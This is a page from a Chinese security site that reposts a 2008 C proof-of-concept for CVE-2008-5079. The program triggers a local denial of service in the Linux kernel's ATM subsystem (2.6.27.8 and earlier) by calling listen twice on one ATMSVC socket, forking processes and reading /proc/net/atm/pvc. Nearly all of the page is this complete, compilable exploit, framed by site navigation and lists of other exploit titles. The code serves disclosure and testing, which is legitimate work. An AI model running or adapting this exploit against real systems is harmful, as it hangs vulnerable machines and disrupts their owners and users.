首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit 来源：jon@oberheide.org 作者：Jon 发布时间：2008-12-11   /*  * cve-2008-5079.c  *  * Linux Kernel <= 2.6.27.8 ATMSVC local DoS  * Jon Oberheide <jon@oberheide.org>  *  * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:  *  *   net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8  *   and earlier allows local users to cause a denial of service   *   (kernel infinite loop) by making two calls to svc_listen for the  *   same socket, and then reading a /proc/net/atm/*vc file, related   *   to corruption of the vcc table.   *  */   #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <errno.h> #include <linux/atm.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/stat.h>   #define NR_CPUS 8 #define PROC_ATM "/proc/net/atm/pvc"   int main(void) {     char *err, dummy[1024];     int i, ret, sock, proc;     struct atm_qos qos;     struct sockaddr_atmsvc addr;       printf("[+] creating ATM socket...\n");       sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);     if (sock < 0) {         err = "socket(2) for type PF_ATMSVC failed";         printf("[-] PoC error: %s (%s)\n", err, strerror(errno));         return 1;     }       memset(&qos, 0, sizeof(qos));     qos.rxtp.traffic_class = ATM_UBR;     qos.txtp.traffic_class = ATM_UBR;     qos.aal = ATM_NO_AAL;       printf("[+] setting socket QoS options...\n");       ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));     if (ret == -1) {         err = "setsockopt(2) for option SO_ATMQOS failed";         printf("[-] PoC error: %s (%s)\n", err, strerror(errno));         return 1;     }       memset(&addr, 0, sizeof(addr));     addr.sas_family = AF_ATMSVC;       printf("[+] binding socket...\n");       bind(sock, (struct sockaddr *) &addr, sizeof(addr));       printf("[+] socket listen...\n");       listen(sock, 10);       printf("[+] duplicate socket listen...\n");       listen(sock, 10);       printf("[+] attempting local DoS...\n");       for (i = 0; i < NR_CPUS; ++i) {         if (fork() != 0) {             break;         }     }       proc = open(PROC_ATM, O_RDONLY);     if (proc == -1) {         err = "opening " PROC_ATM " failed";         printf("[-] PoC error: %s (%s)\n", err, strerror(errno));         return 1;     }     ret = read(proc, &dummy, 1024);     close(proc);         printf("[-] Local DoS failed.\n");       return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MS Internet Explorer XML Parsi ·eZ Publish < 3.9.5/3.10.1/4.0. ·MS Internet Explorer XML Parsi ·EasyMail ActiveX (emmailstore. ·Internet Explorer 7.0 XML 0da ·Vinagre < 2.24.2 show_error() ·Exploits Multiple XSRF in DD-W ·linux x86 shellcode obfuscator ·eZ Publish 3.9.0/3.9.5/3.10.1 ·Internet Explorer 8.0 Beta 2 A ·DD-WRT v24-sp1 (XSRF) Cross Si ·MS Visual Basic ActiveX Contro   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved